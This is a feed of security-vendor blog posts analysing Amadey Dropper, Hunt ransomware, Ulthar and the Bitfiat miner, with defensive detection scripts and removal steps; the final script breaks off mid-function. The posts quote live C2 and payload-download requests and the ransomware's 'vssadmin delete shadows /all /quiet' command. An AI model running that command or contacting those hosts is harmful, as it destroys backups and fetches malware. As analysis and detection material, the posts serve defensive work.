Malware removal – Gridinsoft Blog
https://gridinsoft.com/blogs
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.
Wed, 09 Jul 2025 01:23:21 +0000

What is the Hkbsse.exe Process?
https://gridinsoft.com/blogs/hkbsse-exe-virus/
Sun, 20 Oct 2024 16:27:26 +0000

The post What is the Hkbsse.exe Process? appeared first on Gridinsoft Blog.

Hkbsse.exe is a name of a process related to Amadey Dropper, that you can observe while browsing through the system. This malware delivers other malware to the target system, disables security solutions and does a lot of other dirty things that harm the system pretty badly. In this article, I will explain how to remove this malware and prevent its appearance in future.

Hkbsse.exe Overview

Hkbsse.exe is a malicious process that users can notice in Task Manager. This process has no window, which is typical and hints that malware, namely Amadey Dropper, is present on the system. Its main task is to stealthily deliver payloads in the form of other threats to the computer. I.e., it can deliver any malware, such as spyware or ransomware, to the target system. Due to the fact that Hkbsse.exe runs in the background and has a name similar to a system process, users may not immediately notice its presence.

Hkbsse.exe process in Task Manager (screenshot)

The main method of spreading this malware is spear phishing. That is, the attacker likely has some knowledge about the victim. However, this malware is also spread through hacked programs, games, and generally anything that can be downloaded from torrents or pirate sites. The most common carriers of this malware are cracks, activators, and other software cracking tools. Once on the system, the threat tries to disable built-in defenses and gain the highest privileges on the system. This allows downloaded viruses to run without any restrictions.

Technical Analysis

Let’s take a closer look at what the Hkbsse.exe process is actually doing on the system. Even though it has no visible windows or any signs of activity, the most important actions happen behind the scenes. As I mentioned earlier, if you see the Hkbsse.exe process, then your system is infected with Amadey Dropper malware (sample on VirusTotal). Let’s break down the entire lifecycle of this malware.

Step 1. Initial Access

Throughout the lifecycle, the threat abuses the legitimate Windows Error Reporting Service to avoid triggering anti-malware. Once on the system, the first thing it does is check if there are other instances of this malware running on the system. To do this, it checks for the following mutexes:

Global\SyncRootManager
Local\__DDrawCheckExclMode__
CicLoadWinStaWinSta0
Local\WininetConnectionMutex
Local\WininetProxyRegistryMutex
Local\WininetStartupMutex
Local\_!MSFTHISTORY!_
Local\c:!users!admin!appdata!local!microsoft!windows!history!history.ie5!

If any mutexes are found, the malware terminates further execution. If no mutexes are detected, the malware creates them. As I said above, this is a standard malware practice that prevents multiple copies from running on the same system.

Local\SessionImmersiveColorMutex
Local\ZoneAttributeCacheCounterMutex
Local\ZonesCacheCounterMutex
Local\WininetConnectionMutex
Local\WininetProxyRegistryMutex
Local\WininetStartupMutex

The next step is to check for anti-malware programs and whether the system is virtualized. Depending on the results, the malware's behavior may vary, but it does not always stop execution completely. Most likely, when it sees an enterprise VM, the virus will simply move on. Specifically, the threat checks the following values:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\Software\Microsoft\LanguageOverlay\OverlayPackages\en-US
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap

As you can see, some keys determine the geographical location of the system and its language. Since Amadey Dropper has Russian roots, it has a hard-coded rule not to attack computers located in Russia. In addition, this data is needed to create a fingerprint of the system.

Step 2. Persistence

Next, the malware tries to gain persistence on the system. After performing all the checks and making sure that it is not running on a virtual system, it adds a copy of itself to the locations responsible for autorun. The malware adds itself to the following locations:

C:\Windows\System32\Tasks\Hkbsse
C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask
C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTaskLogon
C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTaskNetwork
C:\Windows\Tasks\Hkbsse.job

This allows the threat to run with the system even if the process has been forcefully terminated, whether by the user interrupting the execution or by any action of a security program.

Step 3. C2 Connection and Payload

After all the preparations are done, the malware accomplishes its main task: deliver the payload to the system. But before it does that, the malware contacts the C2 server, sends the system’s fingerprint and waits for further commands. It sends the following requests:

POST http://185.215.113.26/Dem7kTu/index.php 200
POST http[:]//epohe.ru/tmp/
POST http[:]//sevtvd17ht.top/v1/upload.php 200

Next, the malware gets a response from C2 containing instructions and the actual payload server address, which is as follows:

GET http://185.215.113.26/JLumma.exe 200
GET http://185.215.113.26/JUmer.exe 200
GET http://iakovosioannidis.com/parts/setup2.exe 200

This is how Amadey Dropper delivers the payload to the system. Next, the malware decompresses the payload, resulting in the Hkbsse.exe process that we talked about at the beginning. Among the files delivered by this specific sample, there is Lumma Stealer – a rather notorious virus in recent times.
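The persistence paths and C2 addresses listed in Steps 2 and 3 are the indicators a defender would actually hunt for. The following Python script is an added example (not code from Gridinsoft or from the malware) that matches scheduled-task records and proxy-log lines against those indicators. The log line format, the client IPs and the dropper's location under AppData\Local\Temp are constructed for the example; the task paths and C2 hosts come from the write-up. Note that the SoftwareProtectionPlatform tasks are legitimate Windows tasks, so the example only flags them when their action references the dropped binary.

```python
import re
from urllib.parse import urlparse

# Network indicators named in the write-up, reduced to host names (defanging "[:]" removed).
AMADEY_C2_HOSTS = {"185.215.113.26", "epohe.ru", "sevtvd17ht.top", "iakovosioannidis.com"}

# Scheduled-task files named in the write-up, normalised to lower case with backslashes.
# The SoftwareProtectionPlatform tasks exist on clean systems and are merely repurposed,
# so their presence alone proves nothing: the task action has to be checked as well.
AMADEY_TASK_PATHS = {
    r"c:\windows\system32\tasks\hkbsse",
    r"c:\windows\system32\tasks\microsoft\windows\softwareprotectionplatform\svcrestarttask",
    r"c:\windows\system32\tasks\microsoft\windows\softwareprotectionplatform\svcrestarttasklogon",
    r"c:\windows\system32\tasks\microsoft\windows\softwareprotectionplatform\svcrestarttasknetwork",
    r"c:\windows\tasks\hkbsse.job",
}
DROPPER_NAME = "hkbsse"


def normalize_path(path: str) -> str:
    """Lower-case the path and unify separators so comparisons are exact."""
    return path.strip().lower().replace("/", "\\")


def flag_tasks(tasks):
    """tasks: iterable of (task_file_path, action_command_line).

    A task is flagged when its file name carries the dropper's name, or when it is one
    of the hijacked Windows tasks and its action launches the dropper binary.
    """
    flagged = []
    for path, action in tasks:
        norm = normalize_path(path)
        if DROPPER_NAME in norm:
            flagged.append(path)
        elif norm in AMADEY_TASK_PATHS and DROPPER_NAME in action.lower():
            flagged.append(path)
    return flagged


# Constructed proxy-log line shape: "<timestamp> <client-ip> <METHOD> <url> <status>".
PROXY_LINE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$"
)


def find_c2_traffic(lines):
    """Return (timestamp, client, method, url) for every line whose host is a known C2."""
    hits = []
    for line in lines:
        m = PROXY_LINE.match(line.strip())
        if not m:
            continue  # skip lines that do not fit the expected shape
        host = (urlparse(m["url"]).hostname or "").lower()
        if host in AMADEY_C2_HOSTS:
            hits.append((m["ts"], m["client"], m["method"], m["url"]))
    return hits


# Constructed sample data for a stand-alone run (not captured from a real host).
SAMPLE_TASKS = [
    (r"C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask",
     "sppsvc restart handler (constructed legitimate action)"),
    (r"C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTaskLogon",
     r"C:\Users\admin\AppData\Local\Temp\Hkbsse.exe"),  # constructed dropper location
    (r"C:\Windows\Tasks\Hkbsse.job", r"C:\Users\admin\AppData\Local\Temp\Hkbsse.exe"),
    (r"C:\Windows\System32\Tasks\Microsoft\Windows\Defrag\ScheduledDefrag",
     r"%windir%\system32\defrag.exe -c -h -o -$"),
]
SAMPLE_PROXY_LOG = [
    "2024-10-20T16:01:02Z 10.0.0.5 GET https://www.microsoft.com/ 200",
    "2024-10-20T16:01:09Z 10.0.0.5 POST http://185.215.113.26/Dem7kTu/index.php 200",
    "2024-10-20T16:01:11Z 10.0.0.5 POST http://sevtvd17ht.top/v1/upload.php 200",
    "2024-10-20T16:01:30Z 10.0.0.5 GET http://185.215.113.26/JLumma.exe 200",
    "2024-10-20T16:02:00Z 10.0.0.7 GET https://example.org/index.html 200",
    "malformed line that the parser must skip",
]

if __name__ == "__main__":
    for path in flag_tasks(SAMPLE_TASKS):
        print("suspicious task:", path)
    for hit in find_c2_traffic(SAMPLE_PROXY_LOG):
        print("C2 traffic:", *hit)
```

In a real investigation the task records would come from the Task Scheduler export and the log lines from the proxy or DNS logs; the matching logic stays the same.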

How To Remove Hkbsse.exe?

If you have found Hkbsse.exe running in your Task Manager, it likely means that Microsoft Defender missed it for some reason. This may be because you manually added the threat to the exceptions, or because the threat disabled Defender. Either way, you will now need a third-party anti-malware solution to neutralize the threat. I recommend GridinSoft Anti-Malware as it can effectively remove threats and does not conflict with Microsoft’s built-in solution. Follow these instructions to clean your PC from threats.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

How to Remove a Virus From a Computer in Safe Mode
https://gridinsoft.com/blogs/remove-viruses-safe-mode/
Mon, 15 Jul 2024 14:36:17 +0000

In quite a few cases, you can see advice on using Safe Mode for malware removal. While generally good advice, this practice requires quite a bit of skill and knowledge of where to look for malicious files. And in a number of cases, the manual approach is counterproductive due to the complexity of the operation. But let me show you a step-by-step guide on how to remove malware in Safe Mode that should work against the vast majority of malicious programs.

Is Safe Mode Good for Malware Removal?

Despite being quite useful for malware removal operations, Safe Mode was not meant for this kind of activity. Its main purpose is troubleshooting: in this mode, Windows starts without quite a few modules, startup programs and tasks planned in Task Scheduler. This, however, is exactly what prevents malicious programs from executing, since the majority of them rely on either startup entries or the Scheduler.

Why would one need all this during malware removal? While active, viruses may block executable files from running, or overload the system making any operations impossible to accomplish. The latter is characteristic of coin miners and, in some cases, proxyware. This makes installing antivirus and anti-malware programs nearly impossible, and Safe Mode allows omitting these problems altogether.

How To Run Windows in Safe Mode

There are several ways to enter Safe Mode, which vary depending on certain factors. One particular thing I recommend you to stick to is using Safe Mode with Networking, as it allows connecting to the Internet. If you are using Windows without a password on your user account, it will be much easier to get into Safe Mode. For Windows 10/11 without a user account password, you can follow these steps:

Method 1. Using the Restart Option

Click “Start”, click “Power”, and then click “Restart” while holding the Shift key.

Press Shift + restart to open Windows Recovery menu

In the menu that appears, select “Troubleshoot” → “Advanced options” → “Startup Settings” → “Restart”.

Advanced options on the recovery menu

Then choose the Safe Mode with Networking and press the corresponding key (usually F4 or F5, depending on Windows version).

Startup settings

Method 2. Using Settings

Click “Start” and open “Settings”. In the left menu, click “System”, then scroll down and click “Recovery”.

System settings screenshot

Under “Recovery options”, select “Advanced startup” and click “Restart now”. Then follow steps 2 and 3 from the first method.

Advanced startup menu screenshot

Method 3. Interrupting Normal Boot

Another way to get into Safe Mode is to interrupt the normal boot process three times in a row. In case of three consecutive unsuccessful boots, the OS will automatically enter the Windows Recovery Environment (WinRE), which is useful if you are unable to start Windows for some reason. After this, follow steps 2 and 3 from the first method.

Windows with a User Account Password

If your device is protected by a user account password, you will not be able to use the previous methods. This is related to Windows security and BitLocker, which encrypts all disks. The only way to enter Safe Mode in this case is through System Configuration. Follow these steps:

Press the Win key + R, and in the window that opens, type “msconfig”.

Run menu screenshot

In the System Configuration window, go to the “Boot” tab. Under Boot options, check the “Safe boot” checkbox.

System configuration screenshot

Click “Apply”, then click “Restart”. Now your system will default to booting in Safe Mode until you perform the first two steps again and uncheck the “Safe boot” checkbox.

How to Remove Malware and Viruses in Safe Mode?

If you’ve decided to remove malware from your device with the use of Safe Mode, you may need to know where to look for malware. There are several locations as well as visual signs that may help you with locating the threat. However, I still recommend combining this mode with an anti-malware scan, which I will show later.

Typically, the majority of malware follows certain patterns in where it stores its files. Knowing even a few key locations can help detect the threat in just a few clicks. Malware often uses temporary or hard-to-reach system folders, such as AppData\Roaming\Temp, the root directory of AppData\Roaming, and AppData\Local. By default, these folders are hidden from the user, so you need to enable the display of hidden files in the File Explorer settings to access them.

In addition to the location, it is important to pay attention to files with strange or unfamiliar names. Malware usually uses random combinations of letters or numbers to make them look like generic log files. Another thing to check is the digital signature certificate of the file, especially if a suspicious-looking file has a legitimate-sounding name. If the certificate issuance date is in the future, or the issuer is an unrelated company, it is most definitely malware.
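The three signs described in the last two paragraphs (hiding place, random-looking name, odd signing certificate) can be turned into a triage rule. The Python below is an added example, not Gridinsoft's code: it takes a list of file records (path, signer, certificate date) and reports the ones that show at least two signs, or a future-dated certificate on its own. The file entries, the signer names and the vowel/digit thresholds in the name heuristic are this example's own constructions; the folder list is the article's.

```python
from dataclasses import dataclass
from datetime import date
from pathlib import PureWindowsPath
from typing import List, Optional, Tuple

# Folders the article singles out, matched against the file's direct parent folder.
WATCHED_PARENTS = (r"\appdata\roaming\temp", r"\appdata\roaming", r"\appdata\local")


@dataclass
class FileEntry:
    path: str
    signer: Optional[str] = None       # certificate subject, None when unsigned
    signed_on: Optional[date] = None   # certificate issuance date, if signed


def in_watched_folder(path: str) -> bool:
    """True if the file sits directly in one of the AppData folders named above."""
    parent = str(PureWindowsPath(path).parent).lower()
    return any(parent.endswith(suffix) for suffix in WATCHED_PARENTS)


def looks_random(file_name: str) -> bool:
    """Heuristic for random letter/digit names: a long stem with almost no vowels,
    or a large share of digits. Thresholds are this example's own choice."""
    stem = PureWindowsPath(file_name).stem.lower()
    if len(stem) < 8:
        return False
    letters = [c for c in stem if c.isalpha()]
    vowel_ratio = sum(c in "aeiouy" for c in letters) / max(len(letters), 1)
    digit_ratio = sum(c.isdigit() for c in stem) / len(stem)
    return vowel_ratio < 0.2 or digit_ratio > 0.3


def suspicious_files(entries: List[FileEntry], today: date) -> List[Tuple[str, List[str]]]:
    """Return (path, reasons) for entries worth a closer look. A future-dated certificate
    is enough on its own; otherwise two independent signs are required."""
    results = []
    for e in entries:
        reasons = []
        if in_watched_folder(e.path):
            reasons.append("stored directly in an AppData folder malware favours")
        if looks_random(PureWindowsPath(e.path).name):
            reasons.append("random-looking file name")
        if e.signer is None:
            reasons.append("unsigned")
        elif e.signed_on is not None and e.signed_on > today:
            reasons.append("certificate issued in the future")
        if "certificate issued in the future" in reasons or len(reasons) >= 2:
            results.append((e.path, reasons))
    return results


# Constructed sample listing; signer names and dates are invented for the example.
SAMPLE_ENTRIES = [
    FileEntry(r"C:\Users\admin\AppData\Roaming\Temp\x7k2q9pd.exe"),
    FileEntry(r"C:\Users\admin\AppData\Roaming\svchost.exe", "Contoso Ltd", date(2031, 1, 1)),
    FileEntry(r"C:\Program Files\Vendor\app.exe", "Vendor Inc", date(2023, 5, 1)),
    FileEntry(r"C:\Users\admin\AppData\Local\Google\Chrome\Application\chrome.exe",
              "Google LLC", date(2024, 6, 1)),
    FileEntry(r"C:\Users\admin\Downloads\notes.txt"),
]

if __name__ == "__main__":
    for path, reasons in suspicious_files(SAMPLE_ENTRIES, date(2024, 7, 15)):
        print(path, "->", "; ".join(reasons))
```

The signer and date fields would normally be filled from the file's Authenticode properties; the example keeps them as plain inputs so it runs offline.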

However, detecting and removing malware manually is not only an extremely labor-intensive process but also not always effective. Malicious programs often create copies of themselves in the system and regenerate from them after deletion. This is why using specialized tools that automatically and reliably detect and remove malware is the best solution. As mentioned earlier, Safe Mode disables most Windows services, including Microsoft Defender. It cannot be enabled until you boot the computer in standard Windows mode.

To remove malware in this mode, you need to install third-party solutions. This is why network access is necessary after entering Safe Mode—the malware might block the installation. GridinSoft Anti-Malware is an excellent solution for removing malware in Safe Mode. The detection databases of this antivirus are updated hourly; additionally, it offers a Proactive Protection feature, which protects the system in the background after a normal system boot. Combined with the overall ease of use of the program, it becomes a great option for any system.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

Hunt Ransomware (bughunt@keemail.me)
https://gridinsoft.com/blogs/hunt-ransomware/
Sat, 06 Apr 2024 15:15:00 +0000

Hunt ransomware is a new sample of the Dharma/CrySis ransomware family that appeared on April 5, 2024. This malware aims at encrypting the files and asking a ransom payment for their decryption. It unselectively targets both home users and corporations, correcting the ransom depending on the target. Jakub Kroustek was the first to discover this malware.


What is Hunt Ransomware (bughunt@keemail.me)?

As I’ve said in the introduction, Hunt is a new sample of the Dharma ransomware family, and as a member of it, Hunt ransomware follows its behavior patterns. The most noticeable one for the victim is the complex extension appended to each file, which contains the victim’s ID, the contact email (bughunt@keemail[.]me) and the .hunt extension itself. After encryption, the files look as below:

image.png → image.png.id-C3B22A85.[bughunt@keemail.me].hunt
document.docx → document.docx.id-C3B22A85.[bughunt@keemail.me].hunt

Encrypted files after the Hunt ransomware attack (screenshot)

Hunt ransomware goes through the entirety of user disks, searching for the files it can encrypt. It is capable of encrypting the vast majority of file types, from images and videos to project files of specific software suites. However, this malware carefully avoids any system files – probably to prevent system malfunctions that could force the user into reinstalling the system.

Before applying the encryption, this malware disables built-in Windows backup options, such as Restore Points and Shadow Copies. They are rather useful for reverting the system state to pre-encryption, so such action is rather expected. Hunt ransomware uses the command you can see below to accomplish this.

vssadmin delete shadows /all /quiet

After finishing the encryption (i.e. when it can’t find any more unencrypted files), Hunt ransomware spawns a text file with a ransom note. It also opens an HTA file with more detailed information about what has happened and instructions for the ransom payment. You can see an example of this pop-up window below.
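Two of the behaviours described above are easy to turn into checks: the Dharma-style file name (original name, victim ID, contact email, extension) can be parsed to inventory what was hit, and the vssadmin command can be matched in process-creation logs before encryption completes. The Python below is an added example, not code from Gridinsoft; the sample file names beyond the two quoted in the article and the Sysmon-style event records are constructed.

```python
import re

# Dharma/CrySis naming scheme shown above: <original>.id-<8 hex>.[<email>].<ext>
DHARMA_NAME = re.compile(
    r"^(?P<original>.+?)\.id-(?P<victim_id>[0-9A-Fa-f]{8})\.\[(?P<email>[^\]]+)\]\.(?P<ext>[A-Za-z0-9]+)$"
)


def parse_encrypted_name(name: str):
    """Return the parts of a Dharma-style file name, or None if it does not fit."""
    m = DHARMA_NAME.match(name)
    return m.groupdict() if m else None


def summarise_encrypted(names):
    """Group encrypted files by (victim id, contact email, extension) and count them,
    ignoring files that were not renamed."""
    summary = {}
    for n in names:
        parts = parse_encrypted_name(n)
        if parts is None:
            continue
        key = (parts["victim_id"], parts["email"], parts["ext"])
        summary[key] = summary.get(key, 0) + 1
    return summary


# Shadow-copy deletion as issued by this family (the command quoted in the article).
VSSADMIN_DELETE = re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\s+shadows\b", re.IGNORECASE)


def shadow_deletion_events(events):
    """events: iterable of dicts with 'image' and 'cmdline' (Sysmon-style process creation).
    Returns the events whose command line deletes shadow copies."""
    return [e for e in events if VSSADMIN_DELETE.search(e.get("cmdline", ""))]


# Constructed samples: the first two names are the article's, the rest are invented.
SAMPLE_NAMES = [
    "image.png.id-C3B22A85.[bughunt@keemail.me].hunt",
    "document.docx.id-C3B22A85.[bughunt@keemail.me].hunt",
    "notes.txt.id-C3B22A85.[bughunt@keemail.me].hunt",
    "report.pdf",  # untouched file
]
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\vssadmin.exe", "cmdline": "vssadmin delete shadows /all /quiet"},
    {"image": r"C:\Windows\System32\vssadmin.exe", "cmdline": "vssadmin list shadows"},
    {"image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
]

if __name__ == "__main__":
    for key, count in summarise_encrypted(SAMPLE_NAMES).items():
        print("victim %s, contact %s, extension .%s: %d files" % (*key, count))
    for e in shadow_deletion_events(SAMPLE_EVENTS):
        print("shadow copies deleted by:", e["cmdline"])
```

The shadow-copy check is the one worth alerting on in real time: it fires before the first file is renamed, which is the only window in which the Restore Points are still usable.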

Pop-up message Dharma

How to Decrypt .hunt Files?

There is no dedicated decryption utility for Hunt ransomware available at the moment. This malware uses strong encryption algorithms, so brute force would take a gazillion years to accomplish. However, not everything is lost – tools that exploit flaws in the encryption algos may appear, or law enforcement may take the ransomware down and release the decryption keys. During the first quarter of 2024, several decryption tools were released, so the chances are not that slim.

For now, I can advise you to seek backups outside of the infected system. Cloud storages can contain the files this malware damaged in the attack. Places like social media, email conversations and messengers may contain the originals of the files, too. Even though they may not contain the latest changes, it is better than nothing.

How to Remove Ransomware?

To get rid of the ransomware, I recommend using GridinSoft Anti-Malware. This step is incredibly important to do before performing any attempts to recover the files. The malware remains active, and will instantly encrypt the fresh files. To prevent this and get rid of the infection, run a Full Scan with GridinSoft program and clean all the detected malicious programs.

Trojan:Script/Ulthar.A!ml
https://gridinsoft.com/blogs/trojanscript-ulthar-aml/
Thu, 29 Feb 2024 22:38:55 +0000

Trojan:Script/Ulthar.A!ml is a Windows Defender detection that identifies a trojan; specifically, it refers to a script-based malicious program. However, it can often turn out to be a false positive, where the antivirus labels harmless files as malicious. Let’s understand what this detection is and why it can be false.

What is Trojan:Script/Ulthar.A!ml?

Trojan:Script/Ulthar.A!ml is a generic detection name assigned by Microsoft Defender to a malicious script. Such threats may belong to different malware families, but to simplify the designation, Microsoft groups them by characteristics.

Trojan:Script/Ulthar.A!ml detection Defender

The majority of known Ulthar A!ml cases are attributed to file archives, both of the .zip/.rar and .jar formats. This implies that the detection refers to a threat that uses code packing. Considering the features of archived files, including virtualization used to run Java archives, it is important to take this detection seriously.

Ulthar.A!ml Malware Analysis

During the analysis of Trojan:Script/Ulthar.A!ml, I’ve detected quite a lot of cases when it was assigned to benign files, i.e. was a false positive detection. Popular malware sandboxes and collections did not contain any fresh samples of the malware detected with this name. At the same time, there were some similar malware samples, which simplified my research.

The signature name gives a couple of clues to start with. Trojan:Script is a header attributed to malicious scripts; the “Trojan” part means it may be of any purpose, from gaining initial access to collecting data and delivering other malware. The proper name, “Ulthar”, is not a reference to a Lovecraft book but an umbrella designation of malicious software that shares similar properties. And this is where other clues appear.

As I said, sandboxes do not keep any records regarding Trojan:Script/Ulthar.A!ml, i.e. this specific name. However, VirusTotal keeps the analysis of a malicious program detected as Trojan:Win32/Ulthar.A!ml – not completely the same thing. But the fact that it has the same name means it shares the same core functions with that one Ulthar we are interested in.

Microsoft Defender detection explained (screenshot)

So, what is Ulthar trojan? According to the data from several sources, it is a backdoor, with quite a tricky detection and analysis evasion procedure. It in particular checks whether it is running on a VM or the debug environment, and then protects its file and directory it is located in. After doing all these checks and actions, Ulthar switches to collecting system information – most likely, to create a fingerprint and ease the distinction between this machine and others.

Functions of Ulthar malware. Source: VirusTotal (screenshot)

Typically for backdoors, Ulthar provides remote access to the system. However, it looks like this access is not about a real-time connection, but about remote changes made to the system. The malware grants hackers a lengthy list of things they can do on the infected system, ranging from editing the system registry and directories to launching specific files. The latter is actually the biggest potential danger, as it means Ulthar can deploy other malware.

Is Trojan:Script/Ulthar.A!ml False Positive?

As I’ve mentioned, the Trojan:Script/Ulthar.A!ml name often appears as a false positive detection. In fact, the majority of online feedback points to this detection flagging completely legitimate and safe files, particularly game mods kept in archives. And while malware can be stored in archives, the detections described by different users relate to files that are quite hard to doubt.

Users’ complaints regarding the false detections (Reddit screenshot)

One specific reason why this false detection appears is that it originates from the AI detection system of Microsoft Defender. This is exactly what the “!ml” particle at the end stands for. That system has its merits, but may create problems when it fails to confirm the detection through other detection systems. But don’t think all the “!ml” detections are false – this would be a costly mistake!
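The detection name itself encodes what the paragraphs above unpack by hand: Microsoft's names follow the shape Type:Platform/Family.Variant!Suffix, so the type, the platform, the family and the "!ml" marker can be pulled out programmatically and, for example, used to tell that Trojan:Script/Ulthar.A!ml and Trojan:Win32/Ulthar.A!ml belong to the same family. The Python below is an added example, not Gridinsoft's or Microsoft's code; the only suffix meaning it encodes is "ml", as explained in the article, and the sample list of detection names is constructed.

```python
import re

# Microsoft's naming scheme: Type:Platform/Family.Variant!Suffix (Variant and Suffix optional).
DETECTION_NAME = re.compile(
    r"^(?P<type>[A-Za-z]+):(?P<platform>[A-Za-z0-9_]+)/(?P<family>[A-Za-z0-9_]+)"
    r"(?:\.(?P<variant>[A-Za-z0-9]+))?(?:!(?P<suffix>[A-Za-z0-9]+))?$"
)

# Only the suffix the article explains. Defender uses other suffixes, not covered here.
SUFFIX_MEANING = {"ml": "classified by the machine-learning engine"}


def parse_detection_name(name: str):
    """Split a Defender detection name into its parts, or return None if it does not fit."""
    m = DETECTION_NAME.match(name.strip())
    if not m:
        return None
    parts = m.groupdict()
    parts["suffix_meaning"] = SUFFIX_MEANING.get((parts["suffix"] or "").lower())
    return parts


def is_ml_detection(name: str) -> bool:
    """True when the name carries the !ml marker, i.e. the verdict came from the ML engine."""
    parts = parse_detection_name(name)
    return bool(parts and (parts["suffix"] or "").lower() == "ml")


def same_family(a: str, b: str) -> bool:
    """True when two names share the family component, whatever the platform or variant."""
    pa, pb = parse_detection_name(a), parse_detection_name(b)
    return bool(pa and pb and pa["family"].lower() == pb["family"].lower())


def triage(detections):
    """Separate the !ml verdicts (worth a second opinion, per the article) from the rest."""
    ml, other = [], []
    for d in detections:
        (ml if is_ml_detection(d) else other).append(d)
    return {"ml": ml, "other": other}


# Constructed sample of names as they might appear in a Defender history export.
SAMPLE_DETECTIONS = [
    "Trojan:Script/Ulthar.A!ml",
    "Trojan:Win32/Ulthar.A!ml",
    "Trojan:Script/Phonzy.B!ml",
    "Trojan:Win32/Emotet",
]

if __name__ == "__main__":
    for name in SAMPLE_DETECTIONS:
        print(name, "->", parse_detection_name(name))
    print(triage(SAMPLE_DETECTIONS))
```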


To see whether the file affected by the Trojan:Script/Ulthar.A!ml detection is false positive or not, consider using our GridinSoft Online Virus Scanner. It is completely free, and will show you whether you should be concerned or not in a matter of seconds. Just upload the file, and wait for the verdict.

How to Remove the Trojan:Script/Ulthar.A!ml from PC?

It is not easy to see whether the detected file is malicious without special software. I recommend checking your system with reliable and effective software like GridinSoft Anti-Malware. It has a function called Custom Scan, which enables scanning archives – exactly what you may need in this case. After doing so, you’ll know for sure whether it’s a virus or not. Keep your Anti-Malware updated to the latest version and keep yourself safe when surfing the internet.

Bitfiat Process High CPU – Explained & Removal Guide
https://gridinsoft.com/blogs/bitfiat-process-high-cpu/
Wed, 28 Feb 2024 15:28:06 +0000

Bitfiat is a malicious coin miner that exploits your computer’s hardware to mine cryptocurrencies. Such malware takes as much resources as it can, making the system impossible to use. Let’s see what this malware is, and how to remove it.

Bitfiat Overview

The Bitfiat process is related to the activity of a malicious coin miner. Such malware uses your computer’s resources to mine cryptocurrencies, mainly Monero or DarkCoin. An unusual part about Bitfiat is its origins: it is based on its own technology rather than using XMRig code. This, however, is the last part where it is different from other malware miners – its behavior is as unpleasant as in other cases.

As for the symptoms, they are typical: it causes the CPU to run at maximum capacity, often reaching 100%. You may also notice that your computer’s fan runs at full speed even when you are not using any programs. Moreover, this process usually appears in Task Manager and consumes the most resources. Although coin miners usually don’t harm your files, they make your system unusable due to an overloaded CPU.

The Bitfiat process in Task Manager (screenshot)

Bitfiat Virus Analysis

Despite having the origins different from the majority of malware miners, the infection chain of Bitfiat is pretty much the same. Let’s start from the very beginning and explore the operations of this malware. Fortunately, there are enough samples to analyze.

Spreading Methods

Bitfiat propagates through various channels, primarily leveraging cracked software and software activators (“cracks”). These cracks are often distributed through illicit channels (like torrents) and online forums. They entice users with the promise of unlocking premium software features without needing to purchase anything. Even though it sounds like a fairy tale, unwary users keep downloading such “free” premiums.

Another way of spreading is botnets. By paying the masters of a botnet established with dropper malware, crooks can provide themselves with massive numbers of mining nodes. The thing is, after deploying malware as noticeable as a coin miner, the entire malware spreading chain will be uncovered, and the dropper will most likely be removed from the machine. To maximize profits, miners are spread along with other “visible” malware, like ransomware or proxyware.

Launch, C2 Connection & Mining

The majority of Bitfiat samples do not have any detection evasion tricks. And, well, how can you evade the detection when your process takes up to 80% of the CPU? Right after launching, the malware performs an IP check, then collects some basic info about the system and connects to the command server.

Command servers used by Bitfiat are rather unusual: there is no direct connection to the “main” C2. Instead, the malware retrieves the needed instructions from other infected machines, i.e. they operate like a p2p network. This provides much better stability, up to autonomous existence in cases when the command server is unresponsive.

P2P C2 architecture of Bitfiat (diagram)

The said instructions, in the form of a config file, contain the info about the mining pool and the crypto wallet address. After executing a few command prompt lines, it starts the mining process. And this is the point where the most noticeable sign of malware miner activity appears – an overloaded CPU and a strange process in the list of running programs.
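The symptom the article keeps returning to, one process pinning the CPU for minutes on end, is something a monitoring script can pick out from periodic samples without knowing the miner's name in advance. The Python below is an added example (not Gridinsoft's code) that reads a series of per-process CPU readings taken at a fixed interval and reports the processes that stayed above a threshold for several consecutive samples, so that a short spike from a browser is ignored while a miner is not. The readings, process names and the 80% threshold are constructed for the example; the threshold follows the "up to 80% of the CPU" figure quoted above.

```python
from collections import defaultdict


def sustained_high_cpu(samples, threshold=80.0, min_consecutive=3):
    """samples: list of {process_name: cpu_percent} taken at a fixed interval, oldest first.

    Returns, sorted, the processes that stayed at or above the threshold for at least
    min_consecutive samples in a row at some point. A process missing from a sample
    (exited or not yet started) has its streak reset.
    """
    streak = defaultdict(int)
    flagged = set()
    for sample in samples:
        seen = set()
        for name, cpu in sample.items():
            seen.add(name)
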